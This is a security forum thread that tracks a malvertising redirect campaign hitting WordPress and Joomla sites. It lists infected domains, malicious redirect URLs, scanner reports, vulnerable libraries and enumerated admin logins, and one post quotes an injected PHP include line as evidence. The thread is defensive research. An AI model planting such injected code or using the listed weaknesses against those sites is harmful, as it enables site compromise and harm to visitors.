Pop-up Ad-campaign with malicious redirects to bokotraffic dot com

[polonus]

This campaign to maliciously redirect comes after a previous one which had as infection leader: zulotraffic dot com.
An example can be found here: http://killmalware.com/nkom-nn.ru/
77 sites already has been infected with redirects to this URL
Infested websites mainly have Joomla and WordPress as CMS.
Visitors are being redirected to another adpage, sometimes with fraudulous content or offering dubious download software for mobile apps.
Hosting servers and websites alike should be scanned against malicious code.
Info credits SecurityLab.Ru
Also consider: https://urlquery.net/report.php?id=1468432028185

pol

[polonus]

Seems redirect site has been taken down now, see: https://quttera.com/detailed_report/toolspeaks.com
as I get a 404 not found,

polonus

[polonus]

This one now also redirects there: http://killmalware.com/alexadsindia.com/#
Re: https://aw-snap.info/file-viewer/?tgt=http%3A%2F%2Falexadsindia.com&ref_sel=GSP2&ua_sel=ff&fs=1
And then we see that content comes from Content displayed is from the redirect location, the URL -http://www.terraclicks.com/watch?key=9ee25727d68b023a1c9301c6efa25720   AOS does not flag this destination, but should while WOT has it blocked!
Because of Popups, tracking systems, browser exploits, ads, banners, privacy risks.
Pop-up malvertising: http://malvertising.stopmalwares.com/2015/02/highcpms_vipcpms-com/
AVG has Generic.8C0, and avast?
Hope avast detects in PUP mode, read: http://malvertising.stopmalwares.com/category/bad-ads-network/

polonus (volunteer website security analyst and website error-hunter)

[polonus]

Update recent redirects - current list: http://evuln.com/labs/redirect/bokotraffic.com/
and what we see a full parade of WordPress and Joomla CMS driven websites.

polonus

[polonus]

Update and a recent one here: http://killmalware.com/smpsindore.in/
GoDaddy abuse, see: http://toolbar.netcraft.com/site_report?url=http://www.smpsindore.in
Here we see it happen: https://aw-snap.info/file-viewer/?tgt=http%3A%2F%2Fsmpsindore.in&ref_sel=GSP2&ua_sel=ff&fs=1
This is a Pr0n scam redirect - https://aw-snap.info/file-viewer/?tgt=http://smpsindore.in&ref_sel=none&ua_sel=gbot2&fs=0
(Folks that abhor explicit pr0n spam words should not open last given link!). It is connected with a WordPress theme hack via twentysixteen-fonts-css
See vuln.: -https://wp-themes.com/
Detected libraries:
jquery-migrate - 1.4.1 : -https://wp-themes.com/wp/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.4.1
jquery - 1.12.4 : (active1) -https://wp-themes.com/wp/wp-includes/js/jquery/jquery.js?ver=1.12.4
Info: Severity: medium
https://github.com/jquery/jquery/issues/2432
http://blog.jquery.com/2016/01/08/jquery-2-2-and-1-12-released/
(active) - the library was also found to be active by running code
1 vulnerable library detected

polonus (volunteer website security analyst and website error-hunter)

[polonus]

Update: http://killmalware.com/panamateam.com/#  -> http://evuln.com/labs/redirect/bokotraffic.com/
Ongoing GoDaddy abuse.

pol

[polonus]

Has not been sinkholed yet: http://killmalware.com/awakenedspirityoga.com/
130 sites affected -> http://evuln.com/labs/redirect/bokotraffic.com/
urlquery.net flags:
1 : -   bokotraffic.com/in.cgi?2&seoref=http://www.google.com/url?sa=t&rct=j&q=&a (...)
2 : -bokotraffic.com/in.cgi?2&seoref=https%3A%2F%2Fwww.google.com%2F&parameter=eng (...)

polonus

[polonus]

New update - 109 sites affected: http://killmalware.com/livuk.com/

On such sneaky redirects: https://www.juniper.net/documentation/en_US/src4.8/topics/concept/redirect-server-overview.html
-> http://news.softpedia.com/news/new-attack-on-wordpress-sites-redirects-traffic-to-malicious-urls-503740.shtml

pol

[polonus]

Another recent update found that campaign still going on: http://killmalware.com/redorangeid.nl/#
See:-http://redorangeid.nl
Detected libraries:
jquery-migrate - 1.4.1 : -http://redorangeid.nl/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.4.1
jquery.prettyPhoto - 3.1.5 : (active1) -http://redorangeid.nl/wp-content/themes/jarvis_wp/js/jquery.prettyPhoto.js?ver=4.6.1
Info: Severity: high
https://github.com/scaron/prettyphoto/issues/149
https://blog.anantshri.info/forgotten_disclosure_dom_xss_prettyphoto
jquery - 1.12.4 : (active1) -http://redorangeid.nl/wp-includes/js/jquery/jquery.js?ver=1.12.4
Info: Severity: medium
https://github.com/jquery/jquery/issues/2432
http://blog.jquery.com/2016/01/08/jquery-2-2-and-1-12-released/
(active) - the library was also found to be active by running code
2 vulnerable libraries detected

WP issues: Warning User Enumeration is possible
The first two user ID's were tested to determine if user enumeration is possible.

ID   User   Login
1   roid   roid
2      None
It is recommended to rename the admin user account to reduce the chance of brute force attacks occurring. As this will reduce the chance of automated password attackers gaining access. However it is important to understand that if the author archives are enabled it is usually possible to enumerate all users within a WordPress installation.

Warning Directory Indexing Enabled
In the test we attempted to list the directory contents of the uploads and plugins folders to determine if Directory Indexing is enabled. This is an information leakage vulnerability that can reveal sensitive information regarding your site configuration or content.

/wp-content/uploads/ enabled
/wp-content/plugins/ disabled
Directory indexing was tested on the /wp-content/uploads/ and /wp-content/plugins/ directores. Note that other directories may have this web server feature enabled, so ensure you check other folders in your installation. It is good practice to ensure directory indexing is disabled for your full WordPress installation either through the web server configuration or .htaccess.

polonus

[polonus]

Update - the campaign seems continuing: SE visitors redirects
Visitors from search engines are redirected
to: -http://bokotraffic.com/2.html?seoref=http%3a%2f%2fwww.google.com%2furl%3fsa%3dt%26rct%3dj%26q%3dcityofathensalrecklessdrivingattorney.com%26source%3dweb%26cd%3d1%26ved%3d0cdeqfjag%26url%3dhttp%3a%252f%252fcityofathensalrecklessdrivingattorney.com%252f%26ei%3dwc7yt5qcjbcckqktnwe%26usg%3dafqjcngeeyp3d7uunlajxmivlilyq9o_pg¶meter=cityofathensalrecklessdrivingattorney.com&se=$se&ur=1&http_referer=http%3a%2f%2fcityofathensalrecklessdrivingattorney.com%2f
456 sites infected with redirects to this URL

See where it is not flagged: http://fetch.scritch.org/%2Bfetch/?url=http%3A%2F%2Fcityofathensalrecklessdrivingattorney.com%2F&useragent=Fetch+useragent&accept_encoding=

as

error_reporting(0);ini_set("display_errors", 0);include_once(sys_get_temp_dir()."/SESS_48cd7517d21176f980daa5502d9efb31"); ?>

And where it comes fully analyzed: https://aw-snap.info/file-viewer/?tgt=http%3A%2F%2Fcityofathensalrecklessdrivingattorney.com%2F&ref_sel=GSP2&ua_sel=ff&fs=1

Coming up with a GoogleBot spam check:

Content that was returned by your request for the URL: htxp://cityofathensalrecklessdrivingattorney.com/
Note: Content displayed is from the redirect location, the URL htxp://www.clicksgear.com/watch?key=42392c8156ae1fda90c4564b011032fc

1:  < a href = 'htxp://terraclicks.com/anonymous/' target='_blank'> Anonymous Proxy detected, click here.< /a>

polonus

[polonus]

Another one, no longer with bokotraffic SE redirect but redirecting to a 302 found connection close: http://killmalware.com/couriersoftheworld.com/#
and https://aw-snap.info/file-viewer/?tgt=http%3A%2F%2Fcouriersoftheworld.com%2F&ref_sel=GSP2&ua_sel=ff&fs=1

The default Nginx c-panel website = http://143.95.247.239/cgi-sys/defaultwebpage.cgi
Netcraft risk status 8 red out of 10: http://toolbar.netcraft.com/site_report?url=http://143.95.247.239
-> https://www.threatcrowd.org/ip.php?ip=143.95.247.239  &
-> https://www.threatminer.org/host.php?q=143.95.247.239
Also PHISHing on IP: http://urlquery.net/report.php?id=1473609357649
On hosting server: http://server.easycounter.com/amobaixar.net

polonus

[polonus]

Update: This redirect campaign is still ongoing with 502 sites infected with redirects to this URL.
Example: http://killmalware.com/ocfloorstop.com/#
abuse at godaddy -> https://www.threatcrowd.org/ip.php?ip=23.229.219.69
and http://webyzer.net/ip/23.229.219.69
malware at htxp://crcgroup.gr/ might have been cleansed, but website has outdated WordPress
User Enumeration is possible
The first two user ID's were tested to determine if user enumeration is possible.

ID   User   Login
1   None   manager
2      None
It is recommended to rename the admin user account to reduce the chance of brute force attacks occurring. As this will reduce the chance of automated password attackers gaining access. However it is important to understand that if the author archives are enabled it is usually possible to enumerate all users within a WordPress installation.

2 vuln jQuery libraries detected: http://retire.insecurity.today/#!/scan/587440658b903464c5ca8b773abd1250ad01a7d63afda495b5313b5ed1e57a05

F-X-F-status: https://observatory.mozilla.org/analyze.html?host=crcgroup.gr

polonus

[polonus]

Update:

Still ongoing Spam campaign. Site cleansed from it but now unreachable - 500 error: http://killmalware.com/toddmoreschiplumbing.com/#
and https://aw-snap.info/file-viewer/?tgt=http%3A%2F%2Ftoddmoreschiplumbing.com&ref_sel=GSP2&ua_sel=ff&fs=1
IDS alerts for "ET INFO PDF Using CCITTFax Filter" -> http://95.34.115.158/report.php?id=1479022907761

polonus

[polonus]

Update: the bokotraffic resirect campain is still ongoing and now also infects with terraclicks dot com malcode here:
-https://aw-snap.info/file-viewer/?tgt=http%3A%2F%2Fdspfinc.com%2F&ref_sel=GSP2&ua_sel=ff&fs=1
See: http://killmalware.com/dspfinc.com/
See the terraclicks description report here: https://www.bleepingcomputer.com/forums/t/604640/current-method-to-get-rid-of-terraclick/

pol